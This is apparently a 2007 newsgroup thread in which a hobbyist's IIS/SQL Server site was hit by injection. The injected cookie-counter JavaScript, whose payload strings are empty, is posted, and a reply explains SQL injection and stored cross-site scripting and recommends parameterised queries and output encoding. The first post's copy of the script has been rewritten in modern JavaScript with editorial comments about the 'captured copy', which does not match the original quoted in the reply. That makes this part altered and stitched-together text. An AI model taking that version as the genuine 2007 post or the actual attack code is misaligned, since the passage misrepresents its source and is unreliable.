IIS - SQL Tables Hacked - http://yl18.net/

IIS - SQL Tables Hacked - http://yl18.net/

am 06.11.2007 09:38:14 von peterjonesp1

My personal IIS and SQL Server box, which runs my hobby home pages, has a "leave me a message" form (a set of questions). Someone used that form to get the following script written into my database tables -

This brought my whole system down. I assumed I had full SQL injection validation in place and IIS fully patched; does anyone know of any new vulnerabilities, or has anyone suffered the same attack?

Peter.

"function GetCookie (name) {
var arg = name + "=";
var alen = arg.length;
var clen = document.cookie.length;
var i = 0;
while (i < clen) {
var j = i + alen;
if (document.cookie.substring(i, j) == arg)
return getCookieVal (j);
i = document.cookie.indexOf(" ", i) + 1;
if (i == 0) break;
}
return null;
}

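function SetCookie (name, value, expires, path, domain, secure) {
  // Write one cookie through document.cookie.
  //
  // name    - cookie name, written verbatim (not escaped)
  // value   - cookie value; run through escape() so that "; " and similar
  //           cannot terminate the cookie early.  escape() is legacy, but
  //           it is kept because getCookieVal() pairs it with unescape().
  // expires - optional Date, emitted as "expires=<GMT string>"; omitted when
  //           null/undefined, which yields a session cookie
  // path    - optional "path=" attribute, omitted when null/undefined
  // domain  - optional "domain=" attribute, omitted when null/undefined
  // secure  - optional flag; "; secure" is appended only when it == true
  //
  // The original read the optional arguments through the non-standard
  // SetCookie.arguments property, which throws a TypeError in strict-mode
  // code (including every ES module).  Declaring them as ordinary optional
  // parameters gives the same result for every positional call and works in
  // both sloppy and strict mode.
  let cookie = name + "=" + escape(value);
  if (expires != null) {
    cookie += "; expires=" + expires.toUTCString();
  }
  if (path != null) {
    cookie += "; path=" + path;
  }
  if (domain != null) {
    cookie += "; domain=" + domain;
  }
  if (secure == true) {
    cookie += "; secure";
  }
  document.cookie = cookie;
}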

function DeleteCookie (name) {
  // Expire the cookie called `name` by rewriting it with the value 0 and an
  // expires= attribute one millisecond in the past.  No path or domain
  // attribute is written, so only a cookie stored for the default path of
  // this document is affected.
  const past = new Date(Date.now() - 1);
  document.cookie = name + "=0; expires=" + past.toUTCString();
}
// Expiry used by amt() when it re-arms the "count" cookie.  Despite the
// name, expDays is multiplied by 8 hours, so with expDays = 1 the cookie
// lives for 8 hours from page load, not for one day.
var expDays = 1;
var exp = new Date(Date.now() + expDays * 8 * 60 * 60 * 1000);

function amt(){
  // Per-visitor visit counter kept in the "count" cookie.
  //
  // First visit (no cookie): writes count=1 as a session cookie (no expiry)
  // and returns 1.  Later visits: increments the stored number, rewrites it
  // with the script-level `exp` expiry (see expDays above) and returns the
  // new value.  The code at the bottom of the script only checks whether the
  // result is 1, i.e. "this visitor has not been seen before".
  //
  // A non-numeric cookie value makes parseInt() return NaN, which is then
  // stored back and returned as-is; that quirk is preserved here.
  const stored = GetCookie('count');
  if (stored == null) {
    SetCookie('count', '1');
    return 1;
  }
  const next = parseInt(stored) + 1;
  // The original also reset a local copy of the old value when next < 2;
  // that assignment was never read, so it is not reproduced.
  SetCookie('count', next, exp);
  return next;
}

function getCookieVal(offset) {
  // Return the unescaped cookie value that starts at `offset` in
  // document.cookie.  The value runs up to the next ";" or, for the last
  // cookie in the string, to the end of document.cookie.
  const cookies = document.cookie;
  const terminator = cookies.indexOf(";", offset);
  const end = terminator === -1 ? cookies.length : terminator;
  return unescape(cookies.substring(offset, end));
}
function sethome(){
  // Emits two chunks of markup into the page with document.write().  In this
  // captured copy both strings are empty: whatever was originally written
  // here (presumably the injected markup this thread is about) was stripped
  // before the script was posted, so nothing more can be said about it.
  const chunks = ['', ''];
  for (const chunk of chunks) {
    document.write(chunk);
  }
}
// Entry point of the script: run the visit counter and call sethome() only
// for a visitor who has no "count" cookie yet (amt() returns 1).  The final
// document.write('') runs on every load.  Because amt() re-arms the cookie
// with the 8-hour expiry set above, sethome() fires again for the same
// browser only once that cookie has expired or been cleared.
if (amt() === 1) {
  sethome();
}
document.write('');

Re: IIS - SQL Tables Hacked - http://yl18.net/

am 08.11.2007 19:54:01 von Rick Barber

There really is no foolproof way for IIS to protect against everything; SQL injection in particular is a flaw in the application's own data-access code, not something the web server or its patch level can stop. If you truly suffered a SQL injection attack, it could easily have been done if you are building inline (string-concatenated) SQL statements in your code:

http://www.wwwcoder.com/main/parentid/258/site/2966/68/default.aspx
http://www.4guysfromrolla.com/webtech/061902-1.shtml

Those two articles both give good examples and information on how to code your pages - parameterized queries or parameterized stored procedures instead of concatenated SQL - to minimize and, applied consistently, prevent SQL injection attacks entirely. Note also that since the injected text was written into your tables, any page that renders those columns into HTML without encoding them now serves that script to your visitors (a stored cross-site scripting payload); clean the affected rows and HTML-encode data on output, as well as fixing the queries.

--
Rick Barber

http://www.orcsweb.com
Managed Complex Hosting
#1 in Service and Support

wrote in message
news:1194338294.344607.113420@22g2000hsm.googlegroups.com...
> On my personal IIS and SQL server running my hobby homepages had a
> leave me a message set of questions and managed to get my database
> tables uploaded with -
>
> This brought my whole system down, I assumed I had full SQL Inject
> validation and IIS patching, anyone know of any new vulnerabilies or
> suffered the same attack?
>
> Peter.
>
> "function GetCookie (name) {
> var arg = name + "=";
> var alen = arg.length;
> var clen = document.cookie.length;
> var i = 0;
> while (i < clen) {
> var j = i + alen;
> if (document.cookie.substring(i, j) == arg)
> return getCookieVal (j);
> i = document.cookie.indexOf(" ", i) + 1;
> if (i == 0) break;
> }
> return null;
> }
>
> function SetCookie (name, value) {
> var argv = SetCookie.arguments;
> var argc = SetCookie.arguments.length;
> var expires = (argc > 2) ? argv[2] : null;
> var path = (argc > 3) ? argv[3] : null;
> var domain = (argc > 4) ? argv[4] : null;
> var secure = (argc > 5) ? argv[5] : false;
> document.cookie = name + "=" + escape (value) +
> ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
> ((path == null) ? "" : ("; path=" + path)) +
> ((domain == null) ? "" : ("; domain=" + domain)) +
> ((secure == true) ? "; secure" : "");
> }
>
> function DeleteCookie (name) {
> var exp = new Date();
> exp.setTime (exp.getTime() - 1);
> // This cookie is history
> var cval = 0;
> document.cookie = name + "=" + cval + "; expires=" +
> exp.toGMTString();
> }
> var expDays = 1;
> var exp = new Date();
> exp.setTime(exp.getTime() + (expDays*8*60*60*1000));
>
> function amt(){
> var count = GetCookie('count');
> //var count;
> //alert(count);
> //count = null;
> if(count == null) {
> SetCookie('count','1')
> return 1
> }
> else{
> var newcount = parseInt(count) + 1;
> if(newcount<2) count=1;
> SetCookie('count',newcount,exp);
> //DeleteCookie('count')
> return newcount
> }
> }
>
> function getCookieVal(offset) {
> var endstr = document.cookie.indexOf (";", offset);
> if (endstr == -1)
> endstr = document.cookie.length;
> return unescape(document.cookie.substring(offset, endstr));
> }
> function sethome(){
> document.write('');
> document.write('');
>
> }
> if(amt()==1)
> {
>
> sethome()
> }
> document.write('');"
>